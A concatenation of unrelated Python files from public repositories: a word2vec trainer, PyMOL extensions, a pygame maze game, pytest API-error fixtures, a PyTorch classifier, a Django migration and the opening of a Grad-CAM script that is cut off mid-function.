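# fills a share of the 1e8 slots proportional to count**0.75, so drawing a
# uniform slot index samples negatives from P(w) ~ count(w)**0.75.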
def sigmoid(z):
if z > 6:
return 1.0
elif z < -6:
return 0.0
else:
return 1 / (1 + math.exp(-z))
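# Clamping |z| > 6 cheaply approximates the sigmoid tails (sigmoid(6) ~ 0.9975)
# and avoids math.exp overflow for large negative z.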
def init_net(dim, vocab_size):
# Init syn0 with random numbers from a uniform distribution on the interval [-0.5, 0.5]/dim
tmp = np.random.uniform(low=-0.5 / dim, high=0.5 / dim, size=(vocab_size, dim))
syn0 = np.ctypeslib.as_ctypes(tmp)
syn0 = Array(syn0._type_, syn0, lock=False)
# Init syn1 with zeros
tmp = np.zeros(shape=(vocab_size, dim))
syn1 = np.ctypeslib.as_ctypes(tmp)
syn1 = Array(syn1._type_, syn1, lock=False)
return (syn0, syn1)
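# Standard word2vec initialization: input vectors (syn0) start uniform in
# [-0.5/dim, 0.5/dim] while output vectors (syn1) start at zero; both are
# wrapped in lock-free shared ctypes Arrays so worker processes can update
# them concurrently (Hogwild-style).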
def train_process():
start = 0
end = vocab.bytes
fi.seek(start)
global_word_count = 0
alpha = starting_alpha
word_count = 0
last_word_count = 0
while fi.tell() < end:
line = fi.readline().strip()
# Skip blank lines
if not line:
continue
# Init sent, a list of indices of words in line
sent = vocab.indices(['<bol>'] + line.split() + ['<eol>'])
for sent_pos, token in enumerate(sent):
current_token = Vocab.get_key(vocab, token)
if word_count % 10000 == 0:
global_word_count += (word_count - last_word_count)
last_word_count = word_count
# Recalculate alpha
alpha = starting_alpha * (1 - float(global_word_count) / vocab.word_count)
if alpha < starting_alpha * 0.0001:
alpha = starting_alpha * 0.0001
# Randomize window size, where win is the max window size
current_win = np.random.randint(low=1, high=win + 1)
context_start = max(sent_pos - current_win, 0)
context_end = min(sent_pos + current_win + 1, len(sent))
context = sent[context_start:sent_pos] + sent[sent_pos + 1:context_end]
for context_word in context:
current_context = Vocab.get_key(vocab, context_word)
if current_token in domain_vocab and current_context in domain_vocab:
print "this is trained with first case"
# Init neu1e with zeros
neu1e = np.zeros(dim)
# Compute neu1e and update syn1
classifiers = [(token, 1)] + [(target, 0) for target in table1.sample(neg)]
for target, label in classifiers:
z = np.dot(syn0[context_word], syn1[target])
p = sigmoid(z)
g = alpha * (label - p)
neu1e += g * syn1[target] # Error to backpropagate to syn0
syn1[target] += g * syn0[context_word] # Update syn1
# Update syn0
syn0[context_word] += neu1e
elif current_token and current_context not in domain_vocab:
print "trained with second case"
# Init neu1e with zeros
neu1e = np.zeros(dim)
# Compute neu1e and update syn1
classifiers = [(token, 1)] + [(target, 0) for target in table2.sample(neg)]
for target, label in classifiers:
z = np.dot(syn0[context_word], syn1[target])
p = sigmoid(z)
g = alpha * (label - p)
neu1e += g * syn1[target] # Error to backpropagate to syn0
syn1[target] += g * syn0[context_word] # Update syn1
# Update syn0
syn0[context_word] += neu1e
else:
print "trained using third case"
z = np.random.uniform(0, 1)
pie0 = 0.5
if z < pie0:
# Init neu1e with zeros
neu1e = np.zeros(dim)
# Compute neu1e and update syn1
classifiers = [(token, 1)] + [(target, 0) for target in context]
for target, label in classifiers:
z = np.dot(syn0[context_word], syn1[-target])
p = sigmoid(z)
g = alpha * (label - p)
neu1e += g * syn1[-target] # Error to backpropagate to syn0
syn1[-target] += g * syn0[context_word] # Update syn1
# Update syn0
syn0[context_word] += neu1e
else:
# Init neu1e with zeros
neu1e = np.zeros(dim)
# Compute neu1e and update syn1
classifiers = [(token, 1)] + [(target, 0) for target in context]
for target, label in classifiers:
z = np.dot(syn0[context_word], syn1[target])
p = sigmoid(z)
g = alpha * (label + p)
neu1e += g * syn1[target] # Error to backpropagate to syn0
syn1[target] += g * syn0[context_word] # Update syn1
# Update syn0
syn0[context_word] += neu1e
word_count += 1
# Print progress info
global_word_count += (word_count - last_word_count)
# Print progress info
sys.stdout.write("\rAlpha: %f Progress: %d of %d (%.2f%%)" %
(alpha, global_word_count, vocab.word_count,
float(global_word_count) / vocab.word_count * 100))
sys.stdout.flush()
fi.close()
'''
def save(vocab, syn0, fo, fo2):
print 'Saving model to', fo
dim = len(syn0[0])
#saving the names of the words
fo = open(fo, 'w')
fop = open('pickle_tokens', 'wb')
fo.write('%d %d\n' % (len(syn0), dim))
for token, vector in zip(vocab, syn0):
word = token.word
#vector_str = ' '.join([str(s) for s in vector])
fo.write('%s\n' % (word))
pickle.dump(word, fop)
fo.close()
fop.close()
#saving the numpy arrays of word vectors
fo2 = open(fo2, 'w')
fop2 = open('pickle_vector', 'wb')
fo2.write('%d %d\n' % (len(syn0), dim))
for token, vector in zip(vocab, syn0):
#word = token.word
vector_str = np.array(','.join([str(s) for s in vector]))
fo2.write('%s\n' % (vector_str))
pickle.dump(vector_str, fo2)
fo2.close()
fop2.close()
'''
def save(vocab, syn0, fo):
print 'Saving model to', fo
dim = len(syn0[0])
fo = open(fo, 'w')
fo.write('%d %d\n' % (len(syn0), dim))
for token, vector in zip(vocab, syn0):
word = token.word
vector_str = ','.join([str(s) for s in vector])
fo.write('%s %s\n' % (word, vector_str))
fo.close()
tsne = TSNE(perplexity=30, n_components=2, init='pca', n_iter=5000)
plot_only = 2000
low_dim_embs = tsne.fit_transform(syn0)
plot_with_labels(low_dim_embs)
def global_func(*args):
global vocab, domain_vocab, syn0, syn1, table1, table2, neg, dim, starting_alpha
global win, global_word_count, fi
vocab, domain_vocab, syn0_tmp, syn1_tmp, table1, table2, neg, dim, starting_alpha, win, global_word_count = args[:-1]
fi = open(args[-1], 'r')
with warnings.catch_warnings():
warnings.simplefilter('ignore', RuntimeWarning)
syn0 = np.ctypeslib.as_array(syn0_tmp)
syn1 = np.ctypeslib.as_array(syn1_tmp)
warnings.filterwarnings('ignore')
def similarity(i1, i2):
return (1- spatial.distance.cosine(i1, i2))
def plot_with_labels(low_dim_embs, filename='tsne.png'):
#assert low_dim_embs.shape[0] >= len(labels), "More labels than embeddings"
plt.figure(figsize=(18, 18)) # in inches
for i in xrange(1004):
x, y = low_dim_embs[i, :]
plt.scatter(x, y)
plt.savefig(filename)
def train(fi, fo, neg, dim, alpha, win, min_count):
"""#STEP1"""
# Read train file to init vocab
vocab = Vocab(fi, min_count)
domain_vocab = domain_corpus(di)
"""#STEP2"""
# Init net
syn0, syn1 = init_net(dim, len(vocab))
"""#STEP3"""
global_word_count = 0
"""#STEP4"""
table1 = None
table2 = None
print 'Initializing unigram table'
table1 = UnigramTable1(vocab)
table2 = UnigramTable2(vocab)
global_func(vocab, domain_vocab, syn0, syn1, table1, table2, neg, dim, alpha, win, global_word_count, fi)
""""#STEP5"""
# Begin training using num_processes workers
t0 = time.time()
train_process()
t1 = time.time()
print 'Completed training. Training took', (t1 - t0) / 60, 'minutes'
"""#STEP6"""
# Save model to file
save(vocab, syn0, fo)
i1 = syn0[1]
i2 = syn0[2]
similarity(i1, i2)
fi = 'cleaned_test_data.txt'
fo = 'list_of_words.txt'
fo2 = 'numpy_array_vectors.txt'
di = 'Loughran_McDonald_AggregateIPOWordList.txt'
train(fi, fo, 100, 300, 0.01, 1, 1)
# ======================================================================
# File: /src/pymolscripts/__init__.py  (repo: awacha/pymolscripts)
# ======================================================================
from __future__ import absolute_import, unicode_literals, print_function, with_statement
from pymol import cmd
from . import utils, io, display, betapeptides, bilayer
cmd.extend('save_pdb_ordered', io.savepdb_ordered.save_pdb_ordered)
cmd.extend('save_gro', io.savegro.save_gro)
cmd.extend('show_axes', display.axes.show_axes)
cmd.extend('number_residues', betapeptides.recognize_peptide.number_residues)
cmd.extend('number_chains', betapeptides.recognize_peptide.number_chains)
cmd.extend('recognize_peptide', betapeptides.recognize_peptide.recognize_peptide)
cmd.extend('select_peptide_bonds', betapeptides.recognize_peptide.select_peptide_bonds)
cmd.extend('match_amino_acid', betapeptides.recognize_peptide.match_amino_acid)
cmd.extend('select_beta_backbone', betapeptides.recognize_peptide.select_beta_backbone)
cmd.extend('order_atoms_in_peptide', betapeptides.recognize_peptide.order_atoms_in_peptide)
cmd.extend('beta_hbonds', betapeptides.hbonds.beta_hbonds)
cmd.extend('generate_hbond_constraints', betapeptides.hbonds.generate_hbond_constraints)
cmd.extend('generate_hbond_restraints_harmonic', betapeptides.hbonds.generate_hbond_restraints_harmonic)
cmd.extend('generate_hbond_restraints_piecewise', betapeptides.hbonds.generate_hbond_restraints_piecewise)
cmd.extend('helicize_beta_peptide', betapeptides.setbetahelix.helicize_beta_peptide)
cmd.extend('set_beta_helix', betapeptides.setbetahelix.set_beta_helix)
cmd.extend('select_wrong_bond_numbers', betapeptides.structure_cleaning.select_wrong_bond_numbers)
cmd.extend('select_intralayer_waters', bilayer.bilayertools.select_intralayer_waters)
cmd.extend('optimize_beta_helix', betapeptides.helix_optimization.optimize_beta_helix)
cmd.extend('unbond_close_hydrogen_bonds', betapeptides.hbonds.unbond_close_hydrogen_bonds)
# ======================================================================
# File: /interview/python/sorted_union.py  (repo: derektolliver/spectral-jellyfish)
# ======================================================================
def sorted_union(l1, l2):
p1 = 0
p2 = 0
result = []
while p1 < len(l1) and p2 < len(l2):
to_add = 0
if l1[p1] <= l2[p2]:
to_add = l1[p1]
p1 += 1
else:
to_add = l2[p2]
p2 += 1
        if len(result) == 0 or to_add != result[-1]:
            result.append(to_add)
    if p1 < len(l1):
        for i in range(p1, len(l1)):
            # allow appending while result is still empty (e.g. l2 was empty)
            if len(result) == 0 or result[-1] != l1[i]:
                result.append(l1[i])
    elif p2 < len(l2):
        for i in range(p2, len(l2)):
            if len(result) == 0 or result[-1] != l2[i]:
                result.append(l2[i])
print(result)
if __name__ == "__main__":
l1 = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
l2 = [1, 5, 10, 15, 20, 25]
sorted_union(l1, l2)
l1 = [1, 1, 1, 1, 1, 1]
l2 = [1, 1, 1, 1, 1, 1]
sorted_union(l1, l2)
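    # Expected output for the two runs above (with the empty-result guard):
    #   [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 15, 20, 25]
    #   [1]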
| [
"[email protected]"
] | |
aaaca1623cd6bdac79b7bf18c41748fae13a3de3 | 11ed0243962ca1b88d6a445f61b3c83f6f32dd80 | /No8.Labyrinth_using_pygame.py | f6769ea60d45cfe75ae7c4ad25751c169708f4a0 | [
"MIT"
] | permissive | programmingphys/TrainProgs | be72ce3bcfbeba117dc6079c6ca988c3513d5ef0 | 7a011184a3d936328e0f31f1aca6eb3a86cb3c10 | refs/heads/master | 2020-04-24T08:15:18.045541 | 2019-03-21T11:13:34 | 2019-03-21T11:13:34 | 171,824,996 | 0 | 1 | MIT | 2019-04-19T05:59:50 | 2019-02-21T07:47:43 | Python | UTF-8 | Python | false | false | 8,676 | py | #首先输入行数列数
#esc退出
#r复位
#t提示
import numpy as np
import pygame
from pygame.locals import *
import random
class Labyrinth:
def __init__(self, rows=30, cols=40):
self.rows = rows
self.cols = cols
self.keep_going = 1
        # keep_going = 1 means maze generation is still in progress
self.M=np.zeros((rows,cols,3), dtype=np.uint8)
self.laby=np.ones((rows*2+1,cols*2+1),dtype=np.uint8)
self.N=np.zeros((rows*2+1,cols*2+1,2), dtype=np.uint8)
self.start=[1,0]
self.end = [rows*2-1, cols*2]
self.direction = [[-1, 0], [0, -1], [1, 0], [0, 1]]
def createlaby(self):
M = self.M
r = 0 #row
c = 0 #column
history = [(r,c)]
rows=self.rows
cols=self.cols
while history:
r,c = random.choice(history)
            # pick a frontier cell at random
M[r,c,2] = 1
history.remove((r,c))
check = []
if c > 0:
if M[r,c-1,2]==1:
check.append('L')
elif M[r,c-1,2]==0:
history.append((r,c-1))
M[r,c-1,2]=2
if r > 0:
if M[r-1,c,2]==1:
check.append('U')
elif M[r-1,c,2]==0:
history.append((r-1,c))
M[r-1,c,2]=2
if c < cols-1:
if M[r,c+1,2]==1:
check.append('R')
elif M[r,c+1,2]==0:
history.append((r,c+1))
M[r,c+1,2]=2
if r < rows-1:
if M[r+1,c,2]==1:
check.append('D')
elif M[r+1,c,2]==0:
history.append((r+1,c))
M[r+1,c,2]=2
            # knock down one wall toward a visited neighbor
            # M stores (right-wall-open, down-wall-open, visited) per cell
if len(check):
move_direction=random.choice(check)
if move_direction=='L':
M[r,c-1,0]=1
elif move_direction == 'U':
M[r-1,c,1]=1
elif move_direction == 'R':
M[r,c,0]=1
elif move_direction == 'D':
M[r,c,1]=1
else:
print('Error:select one of wall')
laby = self.laby
        # in the laby matrix, 0 marks a passage and 1 marks a wall
for row in range(0,rows):
for col in range(0,cols):
cell_data = M[row,col]
laby[2*row+1,2*col+1]=0
if cell_data[0] == 1:
laby[2*row+1,2*col+2]=0
if cell_data[1] == 1:
laby[2*row+2,2*col+1]=0
laby[1][0]=0
laby[-2][-1]=0
N=self.N
for i in range(0,2*rows):
for j in range(0,2*cols):
if laby[i,j]==1:
N[i,j,0]=1
N[i,j,1]=1
elif laby[i,j]==0:
if laby[i,j+1]==1:
N[i,j,0]=1
if laby[i+1,j]==1:
N[i,j,1]=1
N[2*rows,:,0]=N[2*rows,:,1]=N[:,2*cols,0]=N[:,2*cols,1]=1
return laby
def solve_laby(self,i,j):
        # solve the maze starting from cell (i, j)
self.start=[i,j]
steps=self.walk()
last =steps[len(self.laby) - 2][len(self.laby[0]) - 1]
lookup_path = [[len(self.laby) - 2, len(self.laby[0]) - 1], ]
while last > 0:
last -= 1
index = lookup_path[-1]
for d in self.direction:
move=[0,0]
move[0]=index[0]+d[0]
move[1]=index[1]+d[1]
val, err = self.at(steps, move)
if val == last:
lookup_path.append(move)
break
lookup_path.pop()
lookup_path.reverse()
lookup_path.pop()
lookup_path.append([i,j])
return lookup_path
def at(self, grid, x):
        # solver helper: bounds-checked lookup into a grid
if x[0] < 0 or x[0] >= len(grid):
return 0,False
if x[1] < 0 or x[1] >= len(grid[0]):
return 0,False
return grid[x[0]][x[1]], True
def walk(self):
        # solver helper: breadth-first search over the open cells
steps = [[i * 0 for i in range(len(self.laby[0]))] for j in range(len(self.laby))]
Q = [self.start]
while len(Q) > 0:
index = Q[0]
if index == self.end:
break
Q = Q[1:]
for d in self.direction:
move=[0,0]
move[0]=index[0]+d[0]
move[1]=index[1]+d[1]
val, ok = self.at(self.laby,move)
if not ok or val == 1:
continue
val, ok = self.at(steps,move)
if not ok or val != 0:
continue
if move == self.start:
continue
val, ok = self.at(steps, index)
if ok:
steps[move[0]][move[1]] = val + 1
Q.append(move)
return steps
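    # walk() is a breadth-first flood fill recording each reachable cell's
    # distance from the start; solve_laby() then backtracks from the exit
    # along strictly decreasing distances to recover a shortest path.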
class Game:
def __init__(self,num_rows,num_cols):
self.size = (600,600)
self.screen = pygame.display.set_mode(self.size)
pygame.display.set_caption('Labyrinth')
font = pygame.font.SysFont(pygame.font.get_default_font(), 55)
text = font.render("Generating...", 1, (255,255,255))
rect = text.get_rect()
rect.center = self.size[0]/2, self.size[1]/2
self.screen.blit(text, rect)
pygame.display.update(rect)
self.rows=num_rows
self.cols=num_cols
self.solve_laby=False
def start(self):
if True:
self.laby_obj = Labyrinth(self.rows,self.cols)
else:
self.laby_obj = Labyrinth(10,10)
self.laby_obj.createlaby()
self.draw_laby()
self.reset_player()
self.loop()
def draw_laby(self):
self.screen.fill((255,255,255))
self.cell_width = self.size[0]/(self.cols*2+1)
self.cell_height = self.size[1]/(self.rows*2+1)
cols=self.cols
rows=self.rows
for i in range(rows*2+1):
for j in range(cols*2+1):
if self.laby_obj.laby[i,j]==1:
pygame.draw.rect(self.screen,(0,0,0),(j*self.cell_width,\
i*self.cell_height,self.cell_width+1,self.cell_height+1))
pygame.display.update()
def reset_player(self):
# Make the sprites for the player.
rect = 0, 0,self.cell_width, self.cell_height
rows=self.rows
cols=self.cols
base = pygame.Surface((self.cell_width, self.cell_height))
base.fill((255,255,255))
self.red = base.copy()
self.green = base.copy()
self.blue_p = base.copy()
self.white = base.copy()
r = (255,0,0)
g = (0,255,0)
b = (0,0,255)
white=(255,255,255)
pygame.draw.ellipse(self.blue_p, b, rect)
pygame.draw.ellipse(self.green, g, rect)
pygame.draw.ellipse(self.white, white, rect)
pygame.draw.ellipse(self.red, r, rect)
        # the player_laby matrix keeps a live record of the cells passed through
self.player_laby =np.zeros((2*rows+1,2*cols+1), dtype=np.uint8)
for i in range(rows*2+1):
for j in range(cols*2+1):
if self.laby_obj.laby[i,j]==0:
self.screen.blit(base, (j*self.cell_width, i*self.cell_height))
self.screen.blit(self.green, (cols*2*self.cell_width, (rows*2-1)*self.cell_height))
self.cx =0
self.cy =1
self.last_move = None # For last move fun
self.solve_laby=False
def loop(self):
self.clock = pygame.time.Clock()
self.keep_going = 1
while self.keep_going:
moved = 0
self.clock.tick(10)
for event in pygame.event.get():
if event.type == QUIT:
self.keep_going = 0
elif event.type == KEYDOWN:
if event.key == K_ESCAPE:
self.keep_going = 0
if event.key == K_r:
self.reset_player()
if event.key==K_t:
self.solve_laby=True
self.pathes=self.laby_obj.solve_laby(self.cy, self.cx)
if event.key == K_DOWN:
self.move_player('d')
moved = 1
if event.key == K_UP:
self.move_player('u')
moved = 1
if event.key == K_LEFT:
self.move_player('l')
moved = 1
if event.key == K_RIGHT:
self.move_player('r')
moved = 1
keys = pygame.key.get_pressed()
if not moved:
if keys[K_DOWN]:
self.move_player('d')
if keys[K_UP]:
self.move_player('u')
if keys[K_LEFT]:
self.move_player('l')
if keys[K_RIGHT]:
self.move_player('r')
self.draw_player()
pygame.display.update()
def move_player(self, dir):
        # M stores (right-wall-open, down-wall-open, visited) per cell
no_move = 0
try:
if dir == 'u':
if not self.laby_obj.N[self.cy-1,self.cx,1]:
self.player_laby[self.cy, self.cx]+= 1
self.cy -= 1
else: no_move = 1
elif dir == 'd':
if not self.laby_obj.N[self.cy,self.cx,1]:
self.player_laby[self.cy, self.cx]+= 1
self.cy += 1
else: no_move = 1
elif dir == 'l':
if not self.laby_obj.N[self.cy,self.cx-1,0]:
self.player_laby[self.cy, self.cx]+= 1
self.cx -= 1
else: no_move = 1
elif dir == 'r':
if not self.laby_obj.N[self.cy,self.cx,0]:
self.player_laby[self.cy, self.cx]+= 1
self.cx += 1
else: no_move = 1
else:
no_move = 1
except KeyError: # Tried to move outside screen
no_move = 1
if ((dir == 'u' and self.last_move == 'd') or \
(dir == 'd' and self.last_move == 'u') or \
(dir == 'l' and self.last_move == 'r') or \
(dir == 'r' and self.last_move == 'l')) and \
not no_move:
self.player_laby[self.cy, self.cx]+= 1
if not no_move:
self.last_move = dir
if self.cx == 2*self.cols and self.cy+1 == 2*self.rows:
self.keep_going = 0
def draw_player(self):
for i in range(self.rows*2+1):
for j in range(self.cols*2+1):
if self.player_laby[i,j] > 0:
self.screen.blit(self.white, (j*self.cell_width, i*self.cell_height))
if self.solve_laby:
for path in self.pathes:
self.screen.blit(self.red, (path[1]*self.cell_width, path[0]*self.cell_height))
self.screen.blit(self.blue_p, (self.cx*self.cell_width, \
self.cy*self.cell_height))
num_rows = int(input("Rows: "))  # number of rows
num_cols = int(input("Columns: "))  # number of columns
pygame.init()
g = Game(num_rows,num_cols)
g.start()
# ======================================================================
# File: /Drill-06/drill6(8-2).py  (repo: hanGB/2018182039-2DGP-DRILLS)
# ======================================================================
from pico2d import *
import random
KPU_WIDTH, KPU_HEIGHT = 1280, 1024
open_canvas(KPU_WIDTH, KPU_HEIGHT)
kpu = load_image("KPU_GROUND.png")
character = load_image("animation_sheet.png")
def cancle():
global game
events = get_events()
for event in events:
if event.type == SDL_QUIT:
game = False
game = True
face = 1
frame = 0
pointx = [random.randint(0, KPU_WIDTH) for n in range(10)]
pointy = [random.randint(0, KPU_HEIGHT) for n in range(10)]
while game:
for n in range(0, 10):
for i in range(0, 100, 1):
clear_canvas()
kpu.draw(KPU_WIDTH / 2, KPU_HEIGHT / 2)
t = i / 100
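            # Catmull-Rom spline: blend four consecutive random control points
            # with cubic weights in t to move the character along a smooth path.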
character_x = ((-t ** 3 + 2 * t ** 2 - t) * pointx[n % 10] + (3 * t ** 3 - 5 * t ** 2 + 2) * pointx[(n + 1) % 10] + (-3 * t ** 3 + 4 * t ** 2 + t) * pointx[(n + 2) % 10] + (t ** 3 - t ** 2) * pointx[(n + 3) % 10]) / 2
character_y = ((-t ** 3 + 2 * t ** 2 - t) * pointy[n % 10] + (3 * t ** 3 - 5 * t ** 2 + 2) * pointy[(n + 1) % 10] + (-3 * t ** 3 + 4 * t ** 2 + t) * pointy[(n + 2) % 10] + (t ** 3 - t ** 2) * pointy[(n + 3) % 10]) / 2
if pointx[(n + 1) % 10] - pointx[(n + 2) % 10] < 0:
face = 1
else:
face = 0
character.clip_draw(frame * 100, 100 * face, 100, 100, character_x, character_y)
frame = (frame + 1) % 8
update_canvas()
cancle()
if game == False:
break
delay(0.01)
| [
"[email protected]"
] | |
1cff17c14a960f91929536de9ce6238f968e1d07 | 2ab5a2208c6a4925b8079fe385b7e39a656e3ea4 | /tests/fixtures/errors.py | d7f6513c645f7418e03784f82f3cd66604bcd6e9 | [
"MIT"
] | permissive | trehansalil/pyairvisual | 3374203d38e9963128819d615b59be353f7c92ce | eec5e294b19f3bf0d8aedbda68c5ad6b8271fd20 | refs/heads/master | 2020-09-04T00:24:02.190629 | 2019-11-01T19:59:43 | 2019-11-01T19:59:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,448 | py | """Define fixtures for the various errors."""
import pytest
@pytest.fixture()
def fixture_city_not_found():
"""Return a response when a city can't be found."""
return {"status": "fail", "data": {"message": "city_not_found"}}
@pytest.fixture()
def fixture_generic_error():
"""Return an unknown/generic error response."""
return {"status": "fail", "data": {"message": "unknown_key"}}
@pytest.fixture()
def fixture_incorrect_api_key():
"""Return a response when an API key is invalid."""
return {"status": "fail", "data": {"message": "incorrect_api_key"}}
@pytest.fixture()
def fixture_key_expired():
"""Return a response when the API key is expired."""
return {"status": "fail", "data": {"message": "api_key_expired"}}
@pytest.fixture()
def fixture_limit_reached():
"""Return a response when the API limit is reached."""
return {"status": "fail", "data": {"message": "call_limit_reached"}}
@pytest.fixture()
def fixture_no_nearest_station():
"""Return a response when the nearest station cannot be determined."""
return {"status": "fail", "data": {"message": "no_nearest_station"}}
@pytest.fixture()
def fixture_no_node():
"""Return a response when a node cannot be found."""
return "node not found"
@pytest.fixture()
def fixture_permission_denied():
"""Return a response when permission is denied."""
return {"status": "fail", "data": {"message": "permission_denied"}}
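# Minimal usage sketch (hypothetical test module): pytest injects a fixture by
# naming it as a test argument, e.g.
#
#     def test_city_not_found(fixture_city_not_found):
#         assert fixture_city_not_found["data"]["message"] == "city_not_found"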
# ======================================================================
# File: /Toy_Example/language_model.py  (repo: skgabriel/Math_Model)
# ======================================================================
# Import statements
import pickle, json, cv2, os, sys
import tqdm, torch, torchvision
import numpy as np
from pprint import pprint
from PIL import Image
from torch.utils.data import Dataset
from torchvision import transforms
from torch.utils.data import DataLoader
from torch.autograd import Variable
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
data_root = './Data/'
class MathData(Dataset):
"""
Data Loading
"""
def __init__(self, root, split='Train', transform = transforms.Compose([transforms.ToTensor()]), feature_index=None, cache_json=True):
self.root = root
self.split = split
self.transform = transform
self.feature_index = feature_index
self.cache_json = cache_json
files = os.listdir(os.path.join(root, split))
self.name_indices = sorted(
[f.split('.')[0] for f in files if f[-4:] == '.jpg'])
if(cache_json):
self.feature_cache = {}
iterate = tqdm.tqdm(self.name_indices)
iterate.set_description('Caching Labels')
for name_index in iterate:
                # read_json_feature expects (split, name_index); derive the
                # dataset prefix from the file name as __getitem__ does
                self.feature_cache[name_index] = self.read_json_feature(
                    name_index.split('_')[0], name_index)
def get_file_path(self, suffix, name_index):
file_name = ('%s.' + '%s')%(name_index, suffix)
return os.path.join(self.root, self.split, file_name)
def read_json_feature(self, split, name_index):
file_path = self.get_file_path('json', split + '_labels')
data = json.load(open(file_path))
file_name = name_index + '.jpg'
return [entry for (index, entry) in enumerate(data)
if entry['image'] == file_name][0]['label']
def __getitem__(self, index):
name_index = self.name_indices[index]
dataset = (name_index.split('_'))[0]
image = Image.open(
self.get_file_path('jpg', name_index)).convert('RGB')
if self.transform is not None:
image = self.transform(image)
if self.cache_json:
feature = self.feature_cache[name_index]
else:
feature = self.read_json_feature(dataset, name_index)
return image, feature
def __len__(self):
return len(self.name_indices)
def unity_collate(batch):
images, features = [], []
for i, b in enumerate(batch):
image, feature = b
images.append(image)
features.append([encode(feature)])
return torch.stack(images), torch.LongTensor(features)
class Net(nn.Module):
"""
neural network architecture code
"""
def __init__(self, feature_id):
super(Net, self).__init__()
self.convs = []
self.BNs = []
# Filter sizes (Input/Output)
io = [(3, 8), (8, 16), (16, 32), (32, 64), (64, 32)]
for i, o in io:
self.convs.append(nn.Conv2d(i, o, 5, stride=2, padding=(0,0)).cuda())
self.BNs.append(nn.BatchNorm2d(o).cuda())
self.fc1 = nn.Linear(32 * 6 * 6, 128).cuda()
self.fc2 = nn.Linear(128, 32).cuda()
self.fc3 = nn.Linear(32, 5) .cuda()
self.drop1 = nn.Dropout()
self.drop2 = nn.Dropout()
self.feature_id = feature_id
self.optimizer = optim.Adam(self.parameters(), lr=1e-4,
weight_decay=1e-4)
self.loss = nn.CrossEntropyLoss()
def forward(self, images):
x = images
for conv, bn in zip(self.convs, self.BNs):
x = bn(F.relu(conv(x)))
x = x.view(-1, 32 * 6 * 6)
x = F.relu(self.drop1(self.fc1(x)))
x = F.relu(self.drop2(self.fc2(x)))
x = self.fc3(x)
return x
def train_batch(self, images, labels):
self.optimizer.zero_grad()
output = self(images)
single_feature_labels = labels[:,self.feature_id]
loss = self.loss(output, single_feature_labels)
loss.backward()
self.optimizer.step()
val, preds = torch.max(output, 1)
return loss.data[0], preds
def save_model(self, file_path):
torch.save(self.state_dict(), file_path)
# Data Loading
batch_size = 64
feature_id = 0
train_set = DataLoader(
    MathData(data_root, cache_json=False),
batch_size = batch_size,
num_workers = 4,
shuffle = True,
collate_fn = unity_collate)
test_set = DataLoader(
    MathData(data_root, cache_json=False, split='test'),
batch_size = batch_size,
num_workers = 4,
shuffle = True,
collate_fn = unity_collate)
model = Net(feature_id)
def run_eval():
"""
Evaluation
"""
model.train(mode=False)
v_pred = []
for images, features in test_set:
image_var = Variable(images).cuda()
label_var = Variable(features).cuda()
val, preds = torch.max(model(image_var), 1)
v_pred.extend([1 if p == g else 0 for p,g in
zip(preds.cpu().data.numpy(),
np.squeeze(features.cpu().numpy()))])
return sum(v_pred)/len(v_pred)
def train(start_epoch, end_epoch):
"""
Training, includes a call to evaluation
"""
model.train()
for epoch in range(start_epoch, end_epoch):
model.train(mode=True)
all_losses = []
t_pred = []
iterate = tqdm.tqdm(train_set)
for images, features in iterate:
image_var = Variable(images).cuda()
label_var = Variable(features).cuda()
loss, preds = model.train_batch(image_var, label_var)
all_losses.append(loss)
t_pred.extend([1 if p == g else 0 for p,g in
zip(preds.cpu().data.numpy(),
np.squeeze(features.cpu().numpy()))])
checkpoint_path = 'single_feature_%i.%i.checkpoint'%(feature_id, epoch)
model.save_model(checkpoint_path)
print('{} Train Loss: {:.5f} Acc: {:.5f} Test Acc: {:.5f}'
.format(epoch, sum(all_losses)/len(all_losses),
sum(t_pred)/len(t_pred), run_eval()))
return all_losses
# If a model is passed in, run evaluation and exit
if len(sys.argv) == 2:
model = pickle.load(open(sys.argv[1], 'rb'))
print(run_eval())
sys.exit()
# Else, train and save
train(0,50)
pickle.dump(model, open('model.pkl','wb'))
# ======================================================================
# File: /kindle/migrations/0017_delete_ebookreview.py  (repo: Kiviak/kivi-site)
# ======================================================================
# Generated by Django 2.2.4 on 2020-10-17 01:37
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('kindle', '0016_ebookreview'),
]
operations = [
migrations.DeleteModel(
name='Ebookreview',
),
]
| [
"[email protected]"
] | |
8b347ac4d0c0ec371f58b5f2f8899224e482b769 | 96808573f1f20cb927ee32121bc65f64de006a99 | /Task3/Grad-CAM_process.py | 7edf237b20e6a6f4357ea8327409c6ff2a4fe8b1 | [] | no_license | zyandtom/images-of-bee-and-wasp-classification | 7f9d622761624e70260c5774d9df343c23ab6d2a | d257d434fc4ab6c1f4131ea9e95e9fb3785747a4 | refs/heads/main | 2023-03-08T19:27:44.039326 | 2021-02-08T11:40:40 | 2021-02-08T11:40:40 | 325,052,003 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,795 | py | import argparse
import cv2
import numpy as np
import torch
from torch.autograd import Function
from torchvision import models
class FeatureExtractor():
""" Class for extracting activations and
registering gradients from targetted intermediate layers """
def __init__(self, model, target_layers):
self.model = model
self.target_layers = target_layers
self.gradients = []
def save_gradient(self, grad):
self.gradients.append(grad)
def __call__(self, x):
outputs = []
self.gradients = []
for name, module in self.model._modules.items():
x = module(x)
if name in self.target_layers:
x.register_hook(self.save_gradient)
outputs += [x]
return outputs, x
class ModelOutputs():
""" Class for making a forward pass, and getting:
1. The network output.
2. Activations from intermeddiate targetted layers.
3. Gradients from intermeddiate targetted layers. """
def __init__(self, model, feature_module, target_layers):
self.model = model
self.feature_module = feature_module
self.feature_extractor = FeatureExtractor(self.feature_module, target_layers)
def get_gradients(self):
return self.feature_extractor.gradients
def __call__(self, x):
target_activations = []
for name, module in self.model._modules.items():
if module == self.feature_module:
target_activations, x = self.feature_extractor(x)
elif "avgpool" in name.lower():
x = module(x)
x = x.view(x.size(0),-1)
else:
x = module(x)
return target_activations, x
def preprocess_image(img):
means = [0.485, 0.456, 0.406]
stds = [0.229, 0.224, 0.225]
preprocessed_img = img.copy()[:, :, ::-1]
for i in range(3):
preprocessed_img[:, :, i] = preprocessed_img[:, :, i] - means[i]
preprocessed_img[:, :, i] = preprocessed_img[:, :, i] / stds[i]
preprocessed_img = \
